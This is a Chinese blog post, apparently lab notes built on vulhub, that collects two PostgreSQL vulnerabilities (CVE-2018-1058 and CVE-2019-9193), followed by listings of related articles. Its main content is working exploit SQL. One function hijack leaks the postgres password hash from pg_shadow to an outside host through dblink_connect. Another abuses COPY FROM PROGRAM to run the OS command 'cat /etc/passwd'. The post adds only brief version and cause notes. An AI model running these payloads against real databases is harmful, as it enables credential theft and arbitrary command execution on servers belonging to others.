Postgresql漏洞合集

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量822 收藏 1
点赞数 1
文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46626737/article/details/131508748
版权

    1.PostgreSQL 提权漏洞(CVE-2018-1058)
        操作技巧:
            psql.exe --host your-ip --username vulhub
            CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
                select dblink_connect((select 'hostaddr=192.168.10.88 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
                SELECT pg_catalog.array_to_string($1,$2);
            $$ LANGUAGE SQL VOLATILE;
        漏洞原理:
        漏洞版本:9.3-10
    2.PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
        操作技巧:
            DROP TABLE IF EXISTS cmd_exec;
            CREATE TABLE cmd_exec(cmd_output text);
            COPY cmd_exec FROM PROGRAM 'cat /etc/passwd';
            SELECT * FROM cmd_exec;
        漏洞原理:
            需要超级管理员数据库用户(postgres)才可以,因为在9.3版本之后,默认得开启了COPY TO/FROM PROGRAM功能,可以让超级用户去执行任意系统命令
        漏洞版本:9.3-11.2

!QK
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现
m0_69801663的博客
12-23 1119
(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现
技术超强的网络安全平台
08-01 365
PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 进入目录
Web安全基础学习:SQL注入漏洞PostgreSql注入
最新发布
qq_51862722的博客
06-18 1136
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
PostgreSQL 存在内存泄露漏洞(CVE-2022-41862)
murphysec的博客
03-09 1089
PostgreSQL是一个由PostgreSQL组织开发的自由对象关系型数据库管理系统。 该项目的受影响版本存在内存泄漏漏洞。该漏洞是由于在建立连接时采用libpq库建立连接的客户端对于接收的字节长度没有限制所导致的。 当libpq客户端缓存了Kerberos凭据并且没有显式禁用选项gssencmode时,攻击者便可控制PostgreSQL服务器在建立Kerberos传输加密时发送一个未终止的字符串,致使libpq客户端过度读取接收缓冲区后面的数据,包括未初始化的字节。继而,将这些未初始化的字节与错误
【CVE】CVE-2019-9193:PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3615
【CVE】CVE-2019-9193PostgreSQL任意命令执行漏洞
PostgreSQL 弱口令漏洞风险
weixin_35757531的博客
12-19 798
PostgreSQL 是一种开源的关系数据库管理系统,它可以运行在各种操作系统平台上。如果 PostgreSQL 数据库的用户使用了弱口令,那么这个数据库就很容易被攻击者攻破。弱口令漏洞会导致攻击者可以通过猜测或使用字典攻击来破解用户的密码,从而获取数据库的访问权限。这样,攻击者就可以篡改、删除或泄露数据库中的数据,甚至可以控制数据库服务器。因此,使用强密码,并定期更换密码,是避免弱口令漏洞风险的...
windowsserver 2016 PostgreSQL9.6.3-2升级解决其安全漏洞问题
diaya的专栏
02-07 1556
此外,系统还装了postgis,所以这里postgis也需要升级成相应的版本:postgis-bundle-pg12x64-setup-3.4.1-1.exe。加了后,发现还是有下面问题,最后在网上找到方法,将C:\Users\Administrator\AppData\Roaming\pgAdmin目录下的所有文件全部删除,才将此问题解决。备份的格式尽量为sql。PostgreSQL 输入验证错误漏洞(CVE-2019-10211)PostgreSQL SQL注入漏洞(CVE-2019-10208)
mysql及postgresql漏洞修复包
02-02
mysql-connector-java-8.0.19版本修复包:mysql-connector-java-8.0.27.jar postgresql--42.1.4版本修复包:postgresql-42.2.26.jar
postgresql离线安装包及依赖库
05-26
每个新版本可能会带来性能提升、新特性和API改进,同时也会修复已知的漏洞。 7. 兼容性:确保安装包与目标操作系统兼容,例如支持Windows、Linux、macOS等。在离线安装时,用户需要确保自己的系统满足PostgreSQL的...
postgresql数据库11.18版本
02-10
9. 错误修复和稳定性增强:每个版本都会修复已知的错误和潜在的安全漏洞,以确保系统的可靠性。11.18版本中的错误修复将提高整体的系统稳定性。 10. 社区支持:PostgreSQL拥有活跃的开发者社区,这意味着11.18版本...
配合PostgreSQL使用
02-16
SonarQube是一款开源的代码质量管理平台,能够检测源代码中的各种问题,包括潜在的bug、代码异味和安全漏洞。在Windows Server 2008 R2这个操作系统上部署SonarQube,需要考虑系统兼容性、安装步骤、服务配置等问题...
PostgreSQL 弱口令漏洞加固.pdf
03-15
PostgreSQL 弱口令漏洞加固
CVE-2018-1058 PostgreSQL 提权漏洞
技术超强的网络安全平台
08-01 166
漏洞原理。
PostgreSQL 输入验证错误漏洞(CVE-2021-32027 )
淡定波的博客
05-19 2140
一、 漏洞情况说明: PostgreSQL 输入验证错误漏洞(CVE-2021-32027 ) The security team typically does not test unsupported versions, but this problem is quite old. While modifying certain SQL array values, missing bounds checks let authenticated database users write arbit
PostgreSQL 提权漏洞复现(CVE-2018-1058)
又菜又爱倒腾的博客
10-29 2629
#PostgreSQL 提权漏洞(CVE-2018-1058)# 一、漏洞简介 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 二、漏洞影响 影响版本 9.3到10 三、产生原因 PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所有的对象都会被创建到这个模式下。所以SELECT * FROM a;
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
SoulCat
05-27 4065
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) 最美好的大概还是那些初识的日子,是对彼此不全然地了解又极度渴望了解的那段时光。 漏洞概述: PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执...
PostgreSQL 提权漏洞(CVE-2018-1058)
EC_Carrot的博客
07-21 806
漏洞简介 PostgreSQLPostgreSQL开发组所研发的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性,例如外键、触发器、视图等。 PostgreSQL 9.3版本至10版本中存在安全漏洞。攻击者可利用该漏洞以超级用户的权限执行代码。 参考文章:https://vulhub.org/#/environments/postgres/CVE-2018-1058/ 漏洞复现 我们先通过普通用户vulhub:vulhub的身份登录postgres: psql --ho
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1050
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
利用PostgreSQL配置不当漏洞实现
whatiwhere的博客
11-25 1844
实验目的 本节学习利用PostgreSQL配置不当漏洞实现以下操作: 利用PostgreSQL读取服务器磁盘文件 利用PostgreSQL向服务器磁盘写文件 实验工具 Navicat Premium 是一款目前互联网上最好用的可多重连接的数据库管理工具,也是navicat premium软件推出的最新版本,能够支持单一程序同时连接到MySQL、MariaDB、SQL Server、SQLite...
Postgresql漏洞
07-28
PostgreSQL是一种常见的开源关系型数据库管理系统,它也有可能存在一些漏洞。由于我无法获取最新的漏洞信息,因此我建议你参考官方渠道或其他可靠的安全资源来获取有关PostgreSQL漏洞的最新信息。你可以查看PostgreSQL官方网站、漏洞数据库或安全论坛等来获取相关信息。记住,及时更新和修补数据库以保持安全性是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值